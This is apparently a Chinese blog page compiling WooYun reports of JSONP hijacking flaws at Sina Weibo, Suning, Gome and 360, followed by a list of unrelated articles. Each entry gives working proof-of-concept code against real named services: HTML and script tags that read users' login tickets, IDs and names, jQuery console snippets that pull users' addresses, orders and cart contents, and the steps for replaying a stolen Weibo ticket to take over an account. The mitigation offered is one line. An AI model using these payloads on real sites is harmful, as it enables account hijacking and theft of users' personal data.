新浪微博之点击我的链接就登录你的微博(JSONP劫持)

生活处处有惊喜啊!逛逛wooyun都能捡到bug. 测试的时候没关burp,逛乌云的时候抓到一条url:

http://login.sina.com.cn/sso/login.php?entry=wbwidget&service=miniblog&encoding=UTF-8&gateway=1&returntype=TEXT&from=&callback=sinaSSOController.autoLoginCallBack3&useticket=1&client=ssologin.js(v1.4.2)&_=1462341848253

当returntype=TEXT时,返回的是jsonp格式:

sinaSSOController.autoLoginCallBack3({"retcode":"0","ticket":"ST-M****M3MQ==-1462342428-xd-D71E5*********D7EB3C15","uid":"31******1","nick":"xxx"});

将ticket,uid,昵称都返回来了。
有了ticket之后,利用与 WooYun: 新浪微博之点击我的链接就登录你的微博(XSS敏感域) 一样。
替换url中的ticket然后访问就会设置认证cookie:

http://passport.weibo.com/wbsso/login?url=http%3A%2F%2Fweibo.com%2F&ticket=ST-MzE****MQ==-1462341863-xd-7F3B3****8A311A14&retcode=0

<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
<html>
<h4><center>weibo jsonp劫持演示</center></h4>
<body>
<script>
var test = function(obj){
alert('uid: ' + obj.uid);
alert('nickname: ' + obj.nick);
alert('ticket: ' + obj.ticket);
}
var s=document.createElement('script');
s.src='http://login.sina.com.cn/sso/login.php?entry=sso&returntype=TEXT&url=http%3A%2F%2Fweibo.com%2F&gateway=1&savestate=999&callback=test&_rand='+Math.random();
document.body.appendChild(s);
</script>
</body>
</html>

登录状态访问:

http://pysandbox.sinaapp.com/kv?act=get&k=weibo_jsonp

苏宁易购多接口问题可泄露用户姓名、地址、订单商品(jsonp案例)

苏宁易购基本所有jsonp接口都没有做防护,导致第三方网站可调用苏宁的jsonp接口获取到用户敏感信息
获取用户登陆状态的接口[是否登陆,会员编号] http://my.suning.com/authStatus?callback=jQuery17206592
获取用户个人信息的接口[加星的邮箱,用户级别,用户安全等级等] http://my.suning.com/memberInfoPageHead.do?callback=jQuery1720402
获取用户订单信息[下单时间,订单号,订单商品,订单金额,订单状态等] http://www.suning.com/emall/myShoppingOrderCmd?itemNum=3&callback=jQuery1720659299
获取用户地址簿接口[所有姓名、住址、加星手机号] http://my.suning.com/address.do?callback=jQuery172081
可能还有一些涉及用户隐私信息的接口我没发现,自查吧

POC

测试方法:
在任何引入了jquery的第三方域名的console里输入如下内容,如果可以显示出用户隐私信息,那么就存在问题
$.ajax({type:"get",url:"http://my.suning.com/authStatus",dataType:"jsonp",jsonp:"callback",success:function(json){console.log('下面是获取到的内容');console.log(json);console.log('上面是在获取到的内容');}});
例如下图是在news.baidu.com获取到的证明截图[一屏幕]

下图是获取到的地址簿截图[地址簿是josnp接口返回html内容,然后js把html插入dom,所以我直接console.log了html内容]

修复方案

要么加token,要么验证refer

国美在线多接口问题可泄露用户姓名、地址、电话等(json劫持实现)

多个jsonp接口无安全措施可泄露用户敏感信息
获取购物车商品接口 http://g.gome.com.cn/ec/homeus/support/add.jsp?callback=jQuery17&method=homeus.checkAllItem&params=%7B%22time%22%3A1433603338755%7D
获取当前登陆国美的用户接口 http://g.gome.com.cn/ec/homeus/navigation/gome/index/loginStyle.jsp?callback=logintop
获取用户待支付数、待评价数、优惠券数等信息的接口 http://g.gome.com.cn/ec/homeus/n/topMygome.jsp?callback=topMygome
获取用户地址簿的接口 http://member.gome.com.cn/myaccount/address/getSecondaryAddress?timer=1433606988720&callback=ckdata
可能还有其他涉及用户敏感信息的jsonp接口我没发现,自查吧

在其他网站引入jquery后在console输入如下内容即可验证是否存在

$.ajax({type:"get",url:"http://member.gome.com.cn/myaccount/address/getSecondaryAddress?timer=1433606988720",dataType:"jsonp",jsonp:"callback",jsonpCallback:"ckdata",success:function(json){console.log('下面是在百度域名下获取到国美的内容');console.log(json);console.log('上面是在百度域名下获取到国美的内容');}});

下面是证明截图

360某json hijacking(只要你登陆访问,我就知道你的用户名,邮箱)

<script>
function wooyun(v)
{
alert(v.username);
}
</script>
<script src="http://js.login.360.cn/?o=sso&m=info&func=wooyun"></script>

总结:

利用常用poc:
<script>
function wooyun(a){
alert(a.uin);
}
</script>
<script src=http://xx.com/x?callback=wooyun></script>
json接口可随意请求,poc代码劫持点击

乌云jsonp案例的更多相关文章

  1. jsonp案例

    <button id="btn">click</button><script type="text/javascript"> ...

  2. 《安全智库》:48H急速夺旗大战通关writeup(通关策略)

    作者:ByStudent   题目名字 题目分值 地址 MallBuilder2 350 mall.anquanbao.com.cn MallBuilder1 200 mall.anquanbao.c ...

  3. CSRF简单介绍及利用方法-跨站请求伪造

    0x00 简要介绍 CSRF(Cross-site request forgery)跨站请求伪造,由于目标站无token/referer限制,导致攻击者可以用户的身份完成操作达到各种目的.根据HTTP ...

  4. 【PHP代码审计】 那些年我们一起挖掘SQL注入 - 8.全局防护盲点的总结下篇

    0x01 背景 现在的WEB应用对SQL注入的防护基本都是判断GPC是否开启,然后使用addlashes函数对单引号等特殊字符进行转义.但仅仅使用这样的防护是存在很多盲点的,接上篇http://www ...

  5. CSRF简单介绍及利用方法

    x00 简要介绍 CSRF(Cross-site request forgery)跨站请求伪造,由于目标站无token/referer限制,导致攻击者可以用户的身份完成操作达到各种目的.根据HTTP请 ...

  6. ZooKeeper未授权漏洞

    ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,是Google的Chubby一个开源的实现,它是集群的管理者,监视着集群中各个节点的状态根据节点提交的反馈进行下一步合理操作.最终, ...

  7. jsonp的案例

    一,转发一 首先基于安全的原因,浏览器是存在同源策略这个机制的,同源策略阻止从一个源加载的文档或脚本获取或设置另一个源加载的文档的属性.看起来不知道什么意思,实践一下就知道了. 1.随便建两个网页 一 ...

  8. JSONP跨域访问百度实现搜索提示小案例

    一.JSONP简介 JSONP 全称 JSON with padding(填充式 JSON 或参数式 JSON),JSONP实现跨域请求的原理,就是动态创建<script>标签,然后利用& ...

  9. jsonp全国天气案例

    案例1: 1.获取跨域数据 2.将数据按照下面的效果放到body里面     key: f49570d39b02b3c203526b5d8255aa61 079179afb105ce2bae9f5d0 ...

随机推荐

  1. 【MIT6.828】centos7下使用Qemu搭建xv6运行环境

    title:[MIT6.828]centos7下使用Qemu搭建xv6运行环境 date: "2020-05-05" [MIT6.828]centos7下搭建xv6运行环境 1. ...

  2. ACM入门问题:最大利益问题

    设最大的利益为maxv,最小值为minv 1.求最大利益的简单算法 ;j<=n-;j++) ;i<=j-;i++) maxv =(maxv与R[j]-R[i]中较大的一个) maxv=ma ...

  3. python学习之if条件句的使用

    if循环 if 条件: 代码块 运行 if else的用法 if elseif else用法 if 条件1: elif 条件2: elif条件3: else:

  4. shell bash终端中输出的颜色和格式详解(超详细)

    文章目录 1) 格式 1.1 Set 1.2 Reset 2)8/16 Colors 2.1 前景(文字) 2.2 背景 3)88/256颜色 3.1 前景(文字) 3.2 背景色 4)组合属性 5) ...

  5. Mysql常用sql语句(13)- having 过滤分组结果集

    测试必备的Mysql常用sql语句,每天敲一篇,每次敲三遍,每月一循环,全都可记住!! https://www.cnblogs.com/poloyy/category/1683347.html 前言 ...

  6. quartus II Warning 好的时序是设计出来的,不是约束出来的

    一.Warning (15714): Some pins have incomplete I/O assignments. Refer to the I/O Assignment Warnings r ...

  7. 一篇文章根治各种HR面的套路问题,文章给出参考答案

    引 IT 行业更重要的是技术面. HR 面只是最后一道把关, 检查这个应聘者是否存在一些 "致命缺陷". 所以整体的面试过程, 大家要保持不卑不亢, 淡定从容, 条理清晰, 沉着稳 ...

  8. luoguP3121解题报告

    p3121 本题首先利用一个手写栈,使元素可以快速出栈,再利用栈快速查询上一个元素在trie中的位置.

  9. 00006-java 下载一个excel模板(文件),前端layui按钮

    下载按钮: <button class="layui-btn layui-btn-sm" data-type="downTemplate">模板下载 ...

  10. node的events模块

    events可以说是node实现异步的基石,也是其他几个常用核心模块api的异步方法的原型. var eventEmitter=require('events').EventEmitter; //va ...